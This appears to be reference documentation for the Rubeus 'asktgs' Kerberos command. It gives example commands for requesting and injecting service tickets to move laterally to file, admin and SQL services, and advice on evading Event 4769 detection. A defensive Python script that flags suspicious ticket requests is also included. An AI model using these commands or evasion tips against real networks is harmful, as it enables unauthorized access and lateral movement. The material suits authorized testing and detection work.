Overview

Request service tickets (TGS) for specific services using an existing Ticket Granting Ticket (TGT). This command enables access to specific services and is essential for lateral movement and service access in Kerberos environments.

Syntax

Rubeus.exe asktgs /ticket:TGT /service:SPN [options]

Required Parameters

  • ticket (string, required) - Base64-encoded TGT or path to .kirbi file
  • service (string, required) - Target service SPN(s), comma-separated for multiple services

Optional Parameters

  • dc (string) - Domain controller to target
  • outfile (string) - Save service ticket to file
  • ptt (boolean) - Pass-the-ticket (inject service ticket)
  • enterprise (boolean) - Use enterprise principal format
  • u2u (boolean) - Request User-to-User authentication ticket
  • enctype (string) - Request specific encryption type (DES|RC4|AES128|AES256)

Examples

# Request CIFS ticket for file access
Rubeus.exe asktgs /ticket:doIFuj... /service:cifs/fileserver.corp.local /ptt

# Request HTTP ticket for web service
Rubeus.exe asktgs /ticket:doIFuj... /service:http/webserver.corp.local /ptt

# Request multiple service tickets
Rubeus.exe asktgs /ticket:doIFuj... /service:cifs/server1.corp.local,http/server2.corp.local

Service Principal Names (SPNs)

File and Print Services:
  • cifs/server.domain.com - SMB/CIFS file sharing
  • nfs/server.domain.com - Network File System
Web Services:
  • http/webserver.domain.com - HTTP web services
  • https/webserver.domain.com - HTTPS secure web
Administrative Services:
  • host/computer.domain.com - General host services
  • rpcss/server.domain.com - RPC endpoint mapper
Directory Services:
  • ldap/dc.domain.com - LDAP directory access
  • gc/dc.domain.com - Global catalog access
SQL Server:
  • MSSQLSvc/server.domain.com:1433 - Default instance
  • MSSQLSvc/server.domain.com:NAMED - Named instance
Oracle:
  • oracle/server.domain.com - Oracle database
Other Databases:
  • postgres/server.domain.com - PostgreSQL
  • mysql/server.domain.com - MySQL

Advanced Options

Standard vs Enterprise:

# Standard format
/service:cifs/server.corp.local

# Enterprise format (useful for cross-domain)
/service:user@domain.com /enterprise

Benefits of Enterprise Format:
  • Works across domain trusts
  • Simplifies cross-domain access
  • Handles complex forest scenarios

U2U Protocol:

/u2u /service:krbtgt/domain.com

Use Cases:
  • Bypass service key requirements
  • Access services without knowing service account password
  • Specialized authentication scenarios

Encryption Type Handling

Automatic Selection:
  • Client and server negotiate highest supported encryption
  • Typically results in AES256 in modern environments
  • Falls back to RC4 for legacy compatibility

Explicit Type Request:

# Request specific encryption
/enctype:AES256  # Preferred for OPSEC
/enctype:RC4     # Compatible but detectable
/enctype:AES128  # Balance of security and performance

Lateral Movement Applications

SMB/CIFS Access:

# Get CIFS ticket and access files
Rubeus.exe asktgs /ticket:TGT /service:cifs/fileserver.corp.local /ptt

# Then access via UNC path
dir \\fileserver.corp.local\share

Remote Administration:

# Get HOST ticket for admin access
Rubeus.exe asktgs /ticket:TGT /service:host/target.corp.local /ptt

# Use for WMI, services, registry, etc.
wmic /node:target.corp.local process list

SQL Server Access:

# Get SQL Server ticket
Rubeus.exe asktgs /ticket:TGT /service:MSSQLSvc/sql01.corp.local:1433 /ptt

# Connect to database
sqlcmd -S sql01.corp.local -E

Service Discovery

PowerShell Discovery:

# Find SPNs for target
setspn -L target.corp.local

# Search for service types
Get-ADUser -Filter {ServicePrincipalName -like "*SQL*"}

LDAP Queries:

# Using ldapsearch
ldapsearch -h dc.corp.local -b "dc=corp,dc=local" "serviceprincipalname=*"

Pass-the-Ticket Integration

Using /ptt flag:

# Automatically inject service ticket
Rubeus.exe asktgs /ticket:TGT /service:cifs/server.corp.local /ptt

Manual Injection:

# Get ticket to file, then inject separately
Rubeus.exe asktgs /ticket:TGT /service:cifs/server.corp.local /outfile:service.kirbi
Rubeus.exe ptt /ticket:service.kirbi

Error Handling

Service Not Found:
KDC_ERR_S_PRINCIPAL_UNKNOWN
  • SPN doesn’t exist or is misspelled
  • Service not registered in Active Directory
Access Denied:
KDC_ERR_BADOPTION
  • TGT doesn’t have required privileges
  • Service account restrictions
Encryption Issues:
KDC_ERR_ETYPE_NOSUPP
  • Requested encryption type not supported
  • Encryption downgrade policies

Operational Security

Event Logs:
  • Event ID 4769 (Service ticket requested)
  • Multiple rapid service ticket requests
  • Unusual service access patterns
Behavioral Indicators:
  • Service tickets without subsequent service access
  • Bulk SPN enumeration
  • Cross-domain service requests
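
The Event ID 4769 indicators above, written as a detection check over exported records. This is an added example, not code from the original page or from the Rubeus project. The records are constructed; the field names follow the 4769 event (TargetUserName, ServiceName, TicketEncryptionType, Status), and the 60-second window and threshold of 3 distinct services are assumed values to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4 = "0x17"  # RC4-HMAC as it appears in TicketEncryptionType
KDC_ERRORS = {  # 4769 Status values for the errors listed under Error Handling
    "0x7": "KDC_ERR_S_PRINCIPAL_UNKNOWN",
    "0xd": "KDC_ERR_BADOPTION",
    "0xe": "KDC_ERR_ETYPE_NOSUPP",
}

# Constructed sample records, not real log data:
# (time, TargetUserName, ServiceName, TicketEncryptionType, Status)
SAMPLE = [
    ("2024-05-01T10:00:01", "alice@CORP.LOCAL", "FILESERVER$", "0x12", "0x0"),
    ("2024-05-01T10:45:00", "alice@CORP.LOCAL", "WEB01$", "0x12", "0x0"),
    ("2024-05-01T10:05:00", "bob@CORP.LOCAL", "SQL01$", "0x12", "0x0"),
    ("2024-05-01T10:05:05", "bob@CORP.LOCAL", "WEB01$", "0x12", "0x0"),
    ("2024-05-01T10:05:09", "bob@CORP.LOCAL", "FILESERVER$", "0x12", "0x0"),
    ("2024-05-01T10:05:12", "bob@CORP.LOCAL", "svc_sql", "0x17", "0x0"),
    ("2024-05-01T10:05:20", "bob@CORP.LOCAL", "cifs/srv9.corp.local",
     "0xffffffff", "0x7"),
]

def analyze(events, window=timedelta(seconds=60), max_services=3):
    """Return sorted (account, finding) pairs for a list of 4769 records."""
    findings = set()
    by_account = defaultdict(list)
    for ts, account, service, etype, status in events:
        status = status.lower()
        if status in KDC_ERRORS:  # failed request: record the KDC error name
            findings.add((account, "failed:" + KDC_ERRORS[status]))
            continue
        if etype.lower() == RC4:  # RC4 ticket issued
            findings.add((account, "rc4:" + service))
        by_account[account].append((datetime.fromisoformat(ts), service))
    for account, reqs in by_account.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):  # sliding window over successful requests
            while reqs[end][0] - reqs[start][0] > window:
                start += 1
            distinct = {svc for _, svc in reqs[start:end + 1]}
            if len(distinct) > max_services:
                findings.add((account, f"burst:{len(distinct)}"))
                break
    return sorted(findings)
```

An account with a baseline of one or two services that suddenly shows a burst, an RC4 ticket and an unknown-principal failure together warrants a closer look than any one of the three alone.
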
Targeted Requests:
  • Request only needed service tickets
  • Space out requests over time
  • Use legitimate service patterns
Encryption Selection:
  • Prefer AES encryption when possible
  • Match environment encryption standards
  • Avoid RC4 in modern environments

Related Commands

  • asktgt - Request TGT for service ticket requests
  • ptt - Pass service tickets to current session
  • s4u - Use service tickets for delegation abuse
  • describe - Analyze service ticket contents